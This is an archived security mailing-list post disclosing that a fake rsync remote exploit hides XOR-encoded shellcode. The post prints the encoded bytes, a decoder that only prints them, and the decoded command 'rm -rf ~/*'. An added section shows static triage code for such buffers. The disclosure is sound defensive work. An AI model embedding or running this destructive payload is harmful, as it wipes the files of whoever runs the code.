Open Source and information security mailing list archives
Message-ID: <BAY8-F52FHfLQV8xl8W00049755@hotmail.com>
From: downbload at hotmail.com (DownBload / Illegal Instruction Labs)
Subject: rsynd-too-open.c posted on fd is backdoored. Don't run it!!!

rsync <= 2.6.1 remote exploit posted to full disclosure list is a fake and
malicious exploit. Don't run it!!!

rsynd-too-open.c:
....
void (*funct) ();
....
(long) funct = &shellcode2;
....
funct();
....

"shellcode2" is a malicious asm code that will delete your home directory.
Shellcode is encrypted with a simple XOR algorithm to obscure its main purpose.
Whoever backdoored this exploit is 100% gaydiot (mix between gay and idiot :).
I can understand people who backdoor exploits to hack machines, but placing
backdoors that will delete user home dir is evil and plain stupid.

[rot@...top BACKDOOR]# gcc back.c
[root@...top BACKDOOR]# ./a.out
è % / b i n / s h s h - c r m - r f ~ / * 2 > / d e v / n u l l

back.c
---cut here---
#include <stdio.h>

/* Encoded buffer copied from rsynd-too-open.c. It is only read as data here. */
char shellcode2[] =
"\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8\x46\xe2\xf9"
"\xeb\x05\xe8\xeb\xff\xff\xff\x17\xdb\xfd\xfc\xfb\xd5\x9b\x91\x99"
"\xd9\x86\x9c\xf3\x81\x99\xf0\xc2\x8d\xed\x9e\x86\xca\xc4\x9a\x81"
"\xc6\x9b\xcb\xc9\xc2\xd3\xde\xf0\xba\xb8\xaa\xf4\xb4\xac\xb4\xbb"
"\xd6\x88\xe5\x13\x82\x5c\x8d\xc1\x9d\x40\x91\xc0\x99\x44\x95\xcf"
"\x95\x4c\x2f\x4a\x23\xf0\x12\x0f\xb5\x70\x3c\x32\x79\x88\x78\xf7"
"\x7b\x35";

int main(void)
{
    /* The encoded part starts at offset 23, after the decoder stub. */
    unsigned char *decrypt = (unsigned char *)shellcode2 + 23;
    unsigned char key = 0xff;   /* key starts at 0xff and decrements per byte */
    int x;

    /* Print the first 0x29 decoded bytes; nothing is executed. */
    for (x = 0; x < 0x29; x++) {
        printf("%c ", *decrypt ^ key);
        decrypt++;
        key--;
    }
    return 0;
}
---cut here---
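The decrementing-key XOR scheme described in the message can be triaged statically before an untrusted proof-of-concept is compiled or run. The following is an added example, not part of the original post: it decodes a buffer purely as data, splits it into printable strings and flags those that look like shell invocations. The function names, the marker list and the sample buffer are constructed for illustration.

```c
#include <stdio.h>
#include <string.h>

/* XOR with a key that starts at `key` and decrements per byte. The operation
 * is its own inverse, so the same routine encodes the constructed sample. */
static void rolling_xor(const unsigned char *in, size_t len,
                        unsigned char key, unsigned char *out)
{
    for (size_t i = 0; i < len; i++)
        out[i] = in[i] ^ key--;
}

/* Decode a suspect buffer as data only (nothing is executed), split it into
 * printable runs of at least 2 characters, print them, and return how many
 * contain a shell marker. Returns -1 if the buffer is too large.
 * The marker list is an illustrative assumption, not a complete rule set. */
static int triage(const unsigned char *enc, size_t len, unsigned char key)
{
    static const char *markers[] = { "/bin/sh", "/dev/null" };
    unsigned char dec[256];
    int hits = 0;
    if (len >= sizeof dec)
        return -1;
    rolling_xor(enc, len, key, dec);
    for (size_t i = 0; i < len; i++)      /* non-printables become separators */
        if (dec[i] < 0x20 || dec[i] > 0x7e)
            dec[i] = '\0';
    dec[len] = '\0';
    for (size_t i = 0; i < len; i += strlen((char *)dec + i) + 1) {
        const char *s = (const char *)dec + i;
        if (strlen(s) < 2)
            continue;
        int hit = strstr(s, markers[0]) || strstr(s, markers[1]);
        printf("%-10s %s\n", hit ? "[SUSPECT]" : "[string]", s);
        hits += hit;
    }
    return hits;
}

/* Constructed sample: a harmless argv-style layout, encoded at run time. */
static const unsigned char plain[] = "\x01/bin/sh\0sh\0-c\0echo constructed";

int main(void)
{
    unsigned char enc[sizeof plain];
    rolling_xor(plain, sizeof plain, 0xff, enc);
    printf("%d suspect string(s)\n", triage(enc, sizeof plain, 0xff));
    return 0;
}
```

A real sample would be passed to `triage` starting at the offset where the decoder stub ends, with the start key read from the stub.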